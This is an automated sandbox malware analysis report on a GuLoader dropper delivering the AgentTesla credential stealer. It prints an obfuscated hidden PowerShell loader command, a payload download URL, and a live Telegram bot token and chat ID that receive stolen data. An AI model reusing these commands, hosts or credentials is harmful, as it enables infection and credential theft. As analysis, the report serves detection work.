Edit tour

Windows Analysis Report
Delivery details.exe

Overview

General Information

Sample name:	Delivery details.exe
Analysis ID:	1409546
MD5:	78ac601a2f48bc5fc7c15edb4c0fb9d7
SHA1:	43096a0ab5cc82736544f5f25ff01e523ce08c2d
SHA256:	f5f07d56fb08266e8109ade046a794451d86b2a3d32228ede3c096ffe8cca8ce
Tags:	exeGuLoader
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected GuLoader

Yara detected Telegram RAT

Hides threads from debuggers

Installs a global keyboard hook

Obfuscated command line found

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Dosfuscation Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Delivery details.exe (PID: 4400 cmdline: C:\Users\user\Desktop\Delivery details.exe MD5: 78AC601A2F48BC5FC7C15EDB4C0FB9D7)

powershell.exe (PID: 1084 cmdline: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4824 cmdline: C:\Windows\system32\cmd.exe" /c "set /A 1^^0 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wab.exe (PID: 4400 cmdline: C:\Program Files (x86)\windows mail\wab.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage?chat_id=5585605185"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3266183941.0000000004BC8000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wab.exe PID: 4400	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wab.exe PID: 4400	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: wab.exe PID: 4400	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1084, TargetFilename: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1084, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, ProcessId: 4824, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), CommandLine: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Delivery details.exe, ParentImage: C:\Users\user\Desktop\Delivery details.exe, ParentProcessId: 4400, ParentProcessName: Delivery details.exe, ProcessCommandLine: powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede), ProcessId: 1084, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	03/15/24-12:36:34.108520
SID:	2851779
Source Port:	49716
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: wab.exe.4400.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage"}
Source: wab.exe.4400.6.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendMessage?chat_id=5585605185"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe	Virustotal: Detection: 13%			Perma Link

Multi AV Scanner detection for submitted file

Source: Delivery details.exe	Virustotal: Detection: 13%			Perma Link
Source: Delivery details.exe	ReversingLabs: Detection: 13%

Source: Delivery details.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 162.240.109.7:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2

Source: Delivery details.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_004066F3 FindFirstFileW,FindClose,	0_2_004066F3
Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405ABE
Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\akroterion\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\akroterion\archmugwump\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49716 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44ec8b632084Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44fbe5c2a9f0Host: api.telegram.orgContent-Length: 914Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc5150fe3e9d7aHost: api.telegram.orgContent-Length: 67189Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc531643bd24a9Host: api.telegram.orgContent-Length: 67189Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44ecc148ce97Host: api.telegram.orgContent-Length: 67199Expect: 100-continue

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET /AqtYsvzFN55.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mzu7.sa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /AqtYsvzFN55.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mzu7.sa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: mzu7.sa.com

Source: unknown

HTTP traffic detected: POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc44ec8b632084Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive

Source: wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.000000002146B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021427000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/
Source: wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021427000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Delivery details.exe, Delivery details.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mzu7.sa.com/
Source: wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3267955978.00000000057F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mzu7.sa.com/AqtYsvzFN55.bin
Source: wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mzu7.sa.com/AqtYsvzFN55.bin2C

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 162.240.109.7:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Source: C:\Users\user\Desktop\Delivery details.exe

Code function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405553

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Delivery details.exe

Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403489

Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_00404D90	0_2_00404D90
Source: C:\Users\user\Desktop\Delivery details.exe	Code function: 0_2_00406ABA	0_2_00406ABA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A84178	6_2_02A84178
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A8E568	6_2_02A8E568
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A8AA10	6_2_02A8AA10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A84A48	6_2_02A84A48
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A83E30	6_2_02A83E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A8DCE8	6_2_02A8DCE8

Source: Delivery details.exe

Static PE information: invalid certificate

Source: Delivery details.exe, 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemles.exeDVarFileInfo$ vs Delivery details.exe
Source: Delivery details.exe	Binary or memory string: OriginalFilenamemles.exeDVarFileInfo$ vs Delivery details.exe
Source: Delivery details.exe.2.dr	Binary or memory string: OriginalFilenamemles.exeDVarFileInfo$ vs Delivery details.exe

Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delivery details.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
